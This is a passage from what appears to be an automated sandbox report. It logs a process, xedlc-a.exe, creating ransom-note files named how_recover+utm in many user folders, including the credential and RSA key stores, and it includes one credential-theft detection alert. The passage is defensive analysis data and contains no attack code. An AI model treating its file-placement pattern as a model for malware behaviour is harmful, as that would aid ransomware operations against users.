- value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778248
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70347
- mode: close
- sequenceNumber: 861
- value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778248
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70353
- mode: created
- sequenceNumber: 862
- value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778249
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70359
- mode: close
- sequenceNumber: 863
- value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778249
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70387
- mode: created
- sequenceNumber: 864
- value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778250
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70392
- mode: close
- sequenceNumber: 865
- value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778250
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70413
- mode: created
- sequenceNumber: 866
- value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778251
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70418
- mode: close
- sequenceNumber: 867
- value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778251
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70426
- mode: created
- sequenceNumber: 868
- value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778252
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70431
- mode: close
- sequenceNumber: 869
- value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778252
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70439
- mode: created
- sequenceNumber: 870
- value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778253
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70445
- mode: close
- sequenceNumber: 871
- value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778253
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70452
- mode: created
- sequenceNumber: 872
- value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778254
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70458
- mode: close
- sequenceNumber: 873
- value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778254
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70464
- mode: created
- sequenceNumber: 874
- value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778255
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70470
- mode: close
- sequenceNumber: 875
- value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778255
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70493
- mode: created
- sequenceNumber: 876
- value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778256
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70499
- mode: close
- sequenceNumber: 877
- value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778256
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70507
- mode: created
- sequenceNumber: 878
- value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778257
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70512
- mode: close
- sequenceNumber: 879
- value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778257
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70519
- mode: created
- sequenceNumber: 880
- value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778258
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70525
- mode: close
- sequenceNumber: 881
- value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778258
- ntstatus: 0x0
- CreateOptions: 0x0
- folder:
- timestamp: 70531
- mode: open
- sequenceNumber: 882
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x21
- file:
- timestamp: 70537
- mode: created
- sequenceNumber: 883
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778259
- ntstatus: 0x0
- CreateOptions: 0x60
- malicious-alert:
- classtype: Data-Theft-Activity
- weight: 0
- ruleid: 2612 : Possible cached credentials theft ; Process creating files inside cached credentials directories
- msg: Process creating files inside cached credentials directories
- display-msg: Possible cached credentials theft
- file:
- timestamp: 70543
- mode: close
- sequenceNumber: 884
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778259
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70563
- mode: created
- sequenceNumber: 885
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778260
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70570
- mode: close
- sequenceNumber: 886
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778260
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70577
- mode: created
- sequenceNumber: 887
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778261
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70583
- mode: close
- sequenceNumber: 888
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778261
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70606
- mode: created
- sequenceNumber: 889
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778262
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70613
- mode: close
- sequenceNumber: 890
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778262
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70659
- mode: created
- sequenceNumber: 891
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778263
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70665
- mode: close
- sequenceNumber: 892
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778263
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70673
- mode: created
- sequenceNumber: 893
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778264
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70679
- mode: close
- sequenceNumber: 894
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778264
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70686
- mode: created
- sequenceNumber: 895
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778265
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70692
- mode: close
- sequenceNumber: 896
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778265
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70699
- mode: created
- sequenceNumber: 897
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778266
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70716
- mode: close
- sequenceNumber: 898
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\RSA\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778266
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70723
- mode: created
- sequenceNumber: 899
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778267
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70728
- mode: close
- sequenceNumber: 900
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778267
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70735
- mode: created
- sequenceNumber: 901
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778268
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70741
- mode: close
- sequenceNumber: 902
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Crypto\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778268
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70748
- mode: created
- sequenceNumber: 903
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778269
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70754
- mode: close
- sequenceNumber: 904
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778269
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70784
- mode: created
- sequenceNumber: 905
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778270
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70790
- mode: close
- sequenceNumber: 906
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\1033\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778270
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70797
- mode: created
- sequenceNumber: 907
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778271
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70803
- mode: close
- sequenceNumber: 908
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778271
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70811
- mode: created
- sequenceNumber: 909
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778272
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70817
- mode: close
- sequenceNumber: 910
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Document Building Blocks\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778272
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70825
- mode: created
- sequenceNumber: 911
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778273
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70831
- mode: close
- sequenceNumber: 912
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778273
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70838
- mode: created
- sequenceNumber: 913
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778274
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70844
- mode: close
- sequenceNumber: 914
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778274
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70851
- mode: created
- sequenceNumber: 915
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778275
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70856
- mode: close
- sequenceNumber: 916
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778275
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70978
- mode: created
- sequenceNumber: 917
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778276
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70984
- mode: close
- sequenceNumber: 918
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Excel\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778276
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71039
- mode: created
- sequenceNumber: 919
- value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778277
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71046
- mode: close
- sequenceNumber: 920
- value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778277
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71056
- mode: created
- sequenceNumber: 921
- value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
